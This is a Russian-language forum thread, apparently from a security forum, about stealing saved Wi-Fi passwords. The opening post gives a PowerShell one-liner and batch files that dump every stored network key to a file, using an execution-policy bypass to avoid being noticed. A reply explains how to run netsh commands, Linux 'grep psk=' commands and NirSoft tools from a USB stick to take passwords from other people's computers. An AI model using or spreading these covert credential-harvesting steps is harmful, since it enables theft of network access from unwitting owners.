• Codeby web-security - Курс "Тестирование Веб-Приложений на проникновение с нуля" от команды codeby. Общая теория, подготовка рабочего окружения, пассивный фаззинг и фингерпринт, Активный фаззинг, Уязвимости, Пост-эксплуатация, Инструментальные средства, Social Engeneering и многое другое. Подробнее ...

  • Мобильный клиент нашего форума для Android гаджетов доступен в Google Play Market по этой ссылке. Клиент можно скачать с нашего форума по этой ссылке. Последняя версия МК в нашем телеграм канале вот здесь

Powershell или же стиллер для wifi

Bahonrex

Well-known member
02.10.2017
53
23
#1
Всем привет)
Пишу первый раз, раньше никогда не писал(
Если все будет супер буду писать и в будущем.
Сам учусь на СИБ-ца :) буду рад за лайки)
Тема своя)

Тема пойдет на powershell.
все мы знаем замечательную команду в CMD
1) "netsh wlan show profiles" - чтоб посмотреть на какие сети компухтер или ноут был подключен.
2)"netsh wlan show profiles "ESSID" key=clear"- чтоб посмотреть пароль от сети.

Нам не удобна смотреть каждый процесс отдельно. Вот поэтому ускорим этот с помощью POWERSHELL
" (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Содержимое ключа\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ ESSID=$name;PASS=$pass }} | Format-Table -AutoSize " - ENTER.


Но пока откроем POWERSHELL и напишем этот скрипт нас спалят(
и вот поэтому мы сейчас сделаем БАТ файл.
1) Отрываем Текстовый документ пишем " (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Содержимое ключа\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ ESSID=$name;PASS=$pass }} | Format-Table -AutoSize " (Без кавычек). И сохраняем "powerkey.ps1"
2)Отрываем Текстовый документ пишем "powershell.exe -ExecutionPolicy Bypass -File powerkey.ps1" Сохраняем pow.bat
3) и последний файл опять отрываем Текстовый документ пишем

@echo off
call pow.bat >wifi/1)wifi.txt 2>&1
exit


И сохраняем start.bat .

4) кидаем все 3 файла в одну папку и в этой же папке создаем папку с название "wifi".
вот и все)
(САМ СКРИПТ НЕ РАБОТАЕТ НА ВСЕХ КОМПЬЮТЕРАХ, В моем случай 4/5).
 
Последнее редактирование:

Remir

Премиум
05.11.2017
209
323
#3
К чему все эти сложности? И не на всех ПК работает (это отдельная тема, там есть тонкости). Хорошо это исключительно для личного общего развития. Кстати, у меня на данном компьютере - не сработало.
Я прекрасно обхожусь следующими двумя инструментами:
  1. Имею на флешке (я так понял, что вся суть ТС в том, чтобы увести PW WiFi) папку WiFi (назовем ее так), а в ней пятОк (можно десяток - кому как удобно и нужно) файлов 1.txt, 2.txt, 3.txt и т.д. со следующим содержанием:
    Код:
    netsh wlan show profiles
    netsh wlan show profiles "ESSID" key=clear
    На случай Линукса можно добавить строку
    Код:
    sudo cat /etc/NetworkManager/system-connections/ИМЯ_СЕТИ | grep psk=
    , а если имя неизвестно, то
    Код:
    sudo grep psk= /etc/NetworkManager/system-connections/*
    . Для удобства их можно вообще держать вместе и выбирать по потребностям, я разнес только для визуального разделения. Итак, выдалась возможность "пошарить". Вставляем флешку, открываем под админом комстроку и текстовик 1. А дальше все быстро и просто: копируем Win-довые команды разом и перепрыгиваем на командную строку, не закрывая текстовик. Вставляем и у нас уже выполнилась первая строка, быстро вписываем ИМЯ_СЕТИ и жмем ENTER. В W10 остальное быстрее всего: CTRL+A, CTRL+C - перескок на текстовик CTRL+V, ALT+F4, ENTER. В младших ОС (за 8-рку не ручаюсь, я ее "органически не перевариваю" и даже не изучал) все эти операции придется выполнить мышкой. Для Линукса я даже расписывать не буду, тут операции с файлами знает 99%. А оставшемуся 1% я посоветую начать изучение Linux именно с этого пункта, а не с увода паролей.
  2. Зачем изобретать велосипед, когда есть уже проверенные и отработанные инструменты? Вот мой списочек, которого, "за глаза" хватает для подобных целей. И всего-то около 35 Мб. Это NIR-soft.
NIR.JPG

Он находится на этой же флешке. Запускаем в зависимости от разрядности ОС и получаем результат

Nir_WirelessKey.JPG

Через правую кнопку мыши на выбранной строке можно сделать экспорт в ASCII для удобочитаемости. Всего-то три щелчка мыши и результат в кармане.

P.S.
Мой пост нисколько не несет в себе отрицания способа ТС. Просто я предпочту изложенный мной вариант.
 

Bahonrex

Well-known member
02.10.2017
53
23
#4
я раньше об этой программе не знал(
спасибо проверил и работает на ура)
 
Вверх Снизу